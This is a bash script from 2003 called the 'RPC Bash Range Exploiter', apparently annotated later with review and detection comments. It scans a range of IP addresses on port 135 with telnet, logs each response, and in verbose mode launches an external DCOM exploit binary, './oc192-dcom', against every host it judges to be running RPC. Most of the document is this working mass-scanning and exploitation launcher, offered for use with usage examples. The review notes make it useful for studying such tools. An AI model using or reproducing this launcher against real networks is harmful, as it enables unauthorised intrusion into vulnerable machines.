#!/bin/bash
# Under GPL ver 2.0 and above
# Greats to all dumb asses, hackers crackers suckers:] and
# All the living Lifeforms that knows me
# Special 10xz to:
# STRASHARO , HellPain , Pro-XeX(necroleak) , Indjeto
# SIC-a , dr0p , ORDER , static , Adrenalinche, krassswr
# and all other shits mensioned above
#
# Special Big Thanx to ORDER who was tester of that shit.
# 
# FAST FAQ:
# Q: What The Hell About ... shall I Use This Shit??
# A: This gets or tries to get a banner from a remote machine
# Running Some kind of httpd, on a range of machines, that
# would possibly run web servers.
#
# Q: Are You Nuts Man??
# A: Quite a lot.:]
#
# Q: You are stupid!
# A: Yeah I know:]
#
# Q: Can I use this stuff for some other checks of daemon banners?
# A: Yes You can. Simply change the $wrong below.
# E: wrong='GET HEAD / HTTP/1.0\n\n\n\n' change the string to the one needed
# to grep the service banner.
#
#  Q:What exactly this stuff does.
#  A:It asks the httpd for banner.
#  So most of the httpds return error and
#  their httpd banner.
#
#
# Q:What Music do you like?
# A: metal, punk, rock, gothic, industrial, trance
#
#
#
## This is dedicated to my ex-girlfriend, whose IRC nickname is fdsg
# Sorry about the raw source, but I don't have time to make
# it look good.
# 
# If errors occur, mail to: hipodilski@openvms-rocks.com
# visit -===www.pc-freak.org===- -- Enjoy The Anti M$ Stuff

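# Path of the external binary that exploit_fn runs against a host and that the
# scan loops hand to `killall -9`. The comment inherited from httpcheck.sh
# called this a "string to send to the service"; nothing in this script sends
# it over the connection.
exploit_cmd='./oc192-dcom'

# Default TCP port probed with telnet; replaced by $2 further down when given.
def_port='135'

# head value (not referenced anywhere else in the visible script)
head_num='10'

# Seconds the scan loops sleep before running killall and closing telnet's
# input.
time='0'

# Directory that receives one telnet transcript per probed address.
# "$HOME" is expanded directly and quoted, so a home path containing
# whitespace or glob characters is kept intact (the original ran it through an
# unquoted `echo`).
log_dir="$HOME/rpc-log"

# Service label used in the printed messages.
service='RPC'

# Base name of the per-host log files: <log_dir>/<service_log_name>-<ip>
service_log_name='rpc-log'

# Raw positional arguments, copied into globals that the functions below read.
string1=$1
string2=$2
string3=$3

# A second argument other than "-v" overrides the default port.
if [ -n "$2" ] && [ "$2" != "-v" ]; then
  def_port="$2"
fi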


# Splits the first script argument (global string1, expected form a.b.c.d-e)
# into its fields using bash pattern substitution only.
# Writes globals: A, A1..A6, C, E, E1 (nothing here is declared local; other
# functions in this script read C, A, A1, A2, A3, A5 and A6).
# Calls help_banner and exits when the range end (A6) comes out empty.
# No numeric or format validation happens in this function.
octet_stuff() {
## whole entered string
A=$string1;
# D
## 4th ip octet
# Everything up to and including the last dot is removed, so A4 still carries
# the "-e" range suffix when one was given (e.g. "d-e").
A4=${A/*./};
# C is A with the first occurrence of ".<A4>" removed, i.e. the "a.b.c" prefix.
# NOTE(review): only the first match is removed; when no range suffix is given
# and an earlier octet equals the last one, a different segment is cut.
C=${A/.$A4/};
# A
## 1st ip octet
# From the first dot to the end is removed, leaving the first field.
A1=${A/.*/};
# E is A without the leading "<A1>." ("b.c.d-e").
E=${A/$A1./};
# B
## 2nd ip octet
A2=${E/.*/};
# C
## 3rd ip octet
# Last dot-separated field of the prefix C.
A3=${C/*./};
## start range num
# A4 with the first "-" and everything after it removed.
A5=${A4/-*/};
# E1 is assigned here but not read anywhere else in the visible script.
E1=${E/-*/};
## end range num
# A4 with everything up to the last "-" removed; when A4 has no "-" this is
# A4 itself, so a single address yields A5 == A6.
A6=${A4/*-/};

# An empty range end (no argument, or input ending in "-") shows the help text.
if [ -z "$A6" ]; then
help_banner;
exit 0;
fi
}

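# Makes sure the log directory named by the global log_dir exists.
# Globals:  log_dir (read)
# Returns:  0 when the directory already exists or was created,
#           1 when mkdir fails (a message is written to stderr).
# The path is quoted so a directory name containing whitespace is handled as
# one path instead of being split into several arguments.
dir_check() {
  if [ -d "$log_dir" ]; then
    return 0
  fi
  if ! mkdir -- "$log_dir"; then
    echo "Cannot create log directory: $log_dir" >&2
    return 1
  fi
}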

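# Validates the fields that octet_stuff extracted from the first argument.
# Globals:  string1, A1, A2, A3, A5, A6 (read); ip_border (written)
# Outputs:  an error message on stderr when a field is rejected
# Exits:    1 when any field is empty, non-numeric, longer than three digits
#           or greater than 255; shows the help text when string1 is empty.
# Changes from the original: $string1 is quoted, the range end (A6) is checked
# as well, non-numeric fields are rejected instead of producing a `[` error
# that was treated as "valid", and a rejected address exits non-zero like the
# other error path in this script.
check_ip_true() {
  ip_border='255'
  local field
  if [ -z "$string1" ]; then
    help_banner
  else
    for field in "$A1" "$A2" "$A3" "$A5" "$A6"; do
      case "$field" in
        # Empty, contains a non-digit, or four or more characters; the length
        # cap also keeps the -gt comparison below within integer range.
        '' | *[!0-9]* | ????*)
          echo "Invalid IP: every octet and the range end must be a number from 0 to $ip_border." >&2
          exit 1
          ;;
      esac
      if [ "$field" -gt "$ip_border" ]; then
        echo "Invalid IP: some IP octet exceeds the allowed range 0 to $ip_border." >&2
        exit 1
      fi
    done
  fi
}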

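# Prints the usage text to stdout and terminates the script with status 0.
# Globals:  service (read)
# The script name is resolved once with `basename -- "$0"`, quoted, so a path
# containing whitespace or starting with "-" is handled as a single operand.
help_banner() {
  local self
  self=$(basename -- "$0")
  printf '%s\n' \
    "$service Bash Range Exploiter by (hipo) from pC-fREAK Org." \
    "Modified from Bash Range Scanner httpcheck.sh" \
    '------------------------=Help=-----------------------' \
    '[syntax]:' \
    "$self [ip-range] [port] :" \
    'port defaults to 135' \
    "Example:" \
    "$self 127.0.0.1-255 135; $self 127.0.0.1-1 80 -v;" \
    'This Example Will try to expl. the range 127.0.0.1-255 and host 127.0.0.1' \
    "If bugs occured mail me at : hipodilski@openvms-rocks.com" \
    '------------------------------------------------------' \
    'Enjoy.!:]'
  exit 0
}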

# Chooses the scan routine from the three saved arguments.
# Globals:  string1, string2, string3 (read)
#   no first argument               -> help text, exit 1
#   range only                      -> do_scan
#   range + port                    -> do_scan1
#   range + "-v", or range/port/-v  -> do_scan2 (verbose)
#   anything else                   -> error message, exit 1
check_params()
{
  if [ -z "$string1" ]; then
    help_banner
    exit 1
  fi

  case "$string2" in
    '')
      do_scan
      ;;
    -v)
      do_scan2
      ;;
    *)
      # A port was supplied; the third argument decides between quiet and
      # verbose mode.
      case "$string3" in
        '')
          do_scan1
          ;;
        -v)
          do_scan2
          ;;
        *)
          echo "Error You have messed something. "
          exit 1
          ;;
      esac
      ;;
  esac
}

# Scan function Num:0 -- selected by check_params when only the address range
# is given. Connects with telnet to every address $C.$A5 .. $C.$A6 in turn on
# $def_port and stores each transcript in $log_dir/$service_log_name-<ip>.
# It does not call exploit_fn.
# Reads globals: log_dir, service_log_name, C, A5, A6, time, exploit_cmd,
# def_port, service.
# Review note (detection): the visible footprint of this loop is one outbound
# TCP connection per consecutive address to a single port, plus one small file
# per address under $log_dir.
do_scan() {
# $i is assigned only by the loop below, so unless the caller's environment
# defines i this touches "<log_dir>/<service_log_name>-<C>." and nothing else.
touch $log_dir/$service_log_name-$C.$i;
for i in `seq $A5 $A6`; do

#host_count='1';
#help_val='1';
#host_count=$(( $host_count + $help_val ));

# The left side of the pipe writes nothing to it: it sleeps $time seconds and
# then runs `killall -9` on $exploit_cmd. When it finishes, telnet's stdin
# reaches end-of-file (presumably what ends the session). telnet's stdout and
# stderr go to the per-host log; the outer redirection discards anything else
# the subshell prints, e.g. killall's messages.
# NOTE(review): the leading "((" relies on bash falling back to two nested
# subshells when the text is not a valid arithmetic command.
((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \
 &> $log_dir/$service_log_name-$C.$i; ) &>/dev/null
echo -e "$service on $C.$i Scanned.";
echo "*------------------------------------------*";
done
}

# Scan function Num:1 -- selected by check_params when a range and a port are
# given without "-v". The body performs the same steps as do_scan (only the
# quoting of the log file name differs); the port in $def_port has already
# been replaced by the second argument at the top of the script.
# Reads globals: log_dir, service_log_name, C, A5, A6, time, exploit_cmd,
# def_port, service. It does not call exploit_fn.
do_scan1() {
# $i is not assigned until the loop starts, so this touches a file whose name
# ends in "<C>." unless i comes from the environment.
touch $log_dir/$service_log_name-$C.$i;
for i in `seq $A5 $A6`; do
# sleep, then `killall -9` on $exploit_cmd, feeds nothing into telnet; telnet's
# stdout and stderr are written to the per-host log, everything else printed
# by the subshell is discarded.
((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \
 &> $log_dir/$service_log_name-"$C.$i";) &> /dev/null;
echo -e "$service on $C.$i Scanned."; 
echo "*------------------------------------------*";
done
}
# Scan function Num:2 (verbose mode).
# NOTE(review): a second function named do_scan2 is defined later in this
# script, before main1 is invoked; bash keeps the later definition, so this
# body is replaced before anything calls it.
do_scan2() {
echo "Verbose Mode On:";
# $i is not assigned until the loop starts (see the for line below).
touch $log_dir/$service_log_name-$C.$i;
for i in `seq $A5 $A6`; do
# NOTE(review): the backslash on the telnet line is followed by a space, so it
# escapes that space instead of the newline. The telnet command therefore ends
# on that line, and the "&>" on the next line is a separate redirection with
# no command attached rather than telnet's output redirection.
((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \ 
&> $log_dir/$service_log_name-"$C.$i";) &> /dev/null
echo '*------------------*';
# Nothing in this function is started in the background with "&".
wait
# Number of lines in the per-host log file.
cur_log_state=`cat $log_dir/$service_log_name-"$C.$i" | wc -l | awk '{ print $1 }'`;
# The line count alone decides the branch: 1 -> exploit_fn, 2 -> reported as
# filtered/down, anything else -> the log is printed.
if [ "$cur_log_state" == 1 ]; then
echo "$service Running.";
echo "Trying to exploit $C.$i.";
exploit_fn;

elif [ "$cur_log_state" == 2 ]; then
echo "port $def_port on $C.$i is filtered or host is down ...";
else
cat "$log_dir"/$service_log_name-"$C.$i";
fi
done
}

# It is supposed to be 3d Scan func but actually :}
# Maybe bash is buggy  and this is simple workaround.
#
# Verbose scan. Because this definition comes last, it is the do_scan2 that
# check_params reaches for both "-v" forms. For every address $C.$A5 ..
# $C.$A6 it records a telnet transcript in $log_dir/$service_log_name-<ip>,
# counts the lines of that file and branches on the count. This is the only
# function in the script that calls exploit_fn.
# Reads globals: log_dir, service_log_name, C, A5, A6, time, exploit_cmd,
# def_port, service. Writes global: cur_log_state.
# Review note (detection): besides the per-address connections and log files,
# this path starts the binary named by $exploit_cmd once per address whose log
# has exactly one line, and issues `killall -9` for that name on every
# iteration.
do_scan2() {
echo "Verbose Mode On:";
# $i is not assigned until the loop starts, so this touches a file whose name
# ends in "<C>." unless i comes from the environment.
touch $log_dir/$service_log_name-$C.$i;
for i in `seq $A5 $A6`; do
# sleep, then `killall -9` on $exploit_cmd, writes nothing into the pipe;
# telnet's stdout and stderr land in the per-host log and the outer
# redirection discards the rest.
((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \
&> $log_dir/$service_log_name-"$C.$i";) &> /dev/null
echo '*------------------*';
# Nothing in this function is started in the background with "&".
wait
# Number of lines in the per-host log file.
cur_log_state=`cat $log_dir/$service_log_name-"$C.$i" | wc -l | awk '{ print $1 }'`;
# Classification is by line count only (string comparison with "=="):
#   1 line  -> treated as "service running", exploit_fn is called
#   2 lines -> reported as filtered port or host down
#   other   -> the log is printed as-is
# NOTE(review): presumably these counts mirror what the local telnet client
# prints for an accepted versus a failed connection; that depends on the
# telnet implementation and is not established by this file.
if [ "$cur_log_state" == 1 ]; then
echo "$C.$i $service service is Running.";
echo "Trying to exploit $C.$i.";
exploit_fn;

elif [ "$cur_log_state" == 2 ]; then
echo "port $def_port on $C.$i is filtered or host is down ...";
else
cat "$log_dir"/$service_log_name-"$C.$i";
fi
done
 }

# Prints the closing summary for the range held in the global A.
# Inside this script the function name shadows the system `last` command.
last () {
  local closing_msg="\nScan on $A Completed.\n\n "
  echo -e "$closing_msg"
}

# Runs the external binary named by $exploit_cmd for the current loop address,
# passing it as "-d <C>.<i>" together with "-t $type".
# Reads globals: exploit_cmd, C, i, type.
# NOTE(review): `type` is not assigned anywhere in the visible script, so
# unless it comes from the caller's environment "-t" is passed without a value.
# All expansions on the command line are unquoted and undergo word splitting.
exploit_fn () {
$exploit_cmd -d $C.$i -t $type;
}

# Entry point: runs the stages in a fixed order -- parse the range argument,
# validate the octets, make sure the log directory exists, dispatch to a scan
# routine, print the closing line. Any stage may end the script itself by
# calling exit (octet_stuff, check_ip_true, help_banner and check_params do).
main1 () {
  local stage
  for stage in octet_stuff check_ip_true dir_check check_params last; do
    "$stage"
  done
}
main1
# Release date
# Oct. 12 04:25:02 EEST 2003
